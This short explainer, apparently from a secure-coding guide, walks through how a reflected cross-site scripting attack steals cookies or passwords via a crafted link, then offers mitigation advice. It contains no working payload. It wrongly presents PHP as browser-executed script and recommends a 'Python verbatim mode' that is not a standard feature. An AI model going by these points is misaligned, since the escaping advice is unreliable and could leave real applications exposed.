A cross-site scripting exploit works like this:
- An attacker identifies a web application that echoes user-provided data in its URLs (e.g., a search string).
- The attacker then forms a URL that includes HTML (not necessarily with a header) and some in-line script like Javascript or PHP.
- The attacker then, by hook or by crook, gets a victim to click on the link. This can be on a web page or an email -- anything that is HTML-based.
- When the victim clicks the link, the victim's browser send a GET request with the malformed HTML-Script combination to the vulnerable application.
- When the web application echoes the user data, the victim's browser reads the URL, along with the HTML, and executes the script contained therein. The scripting can be used for just about anything - user cookies, modifying web links, pilfering passwords, etc.
All of this is possible because the web application receives user data, does not check the input, and echoes it back in a URL. Naturally, this feeds back into the first issue, unvalidated input. If, however, the input field must be able to handle code, be sure to replace any instances of metacharacters with their escaped version and handle the string with Python's verbatim mode as much as reasonably possible.
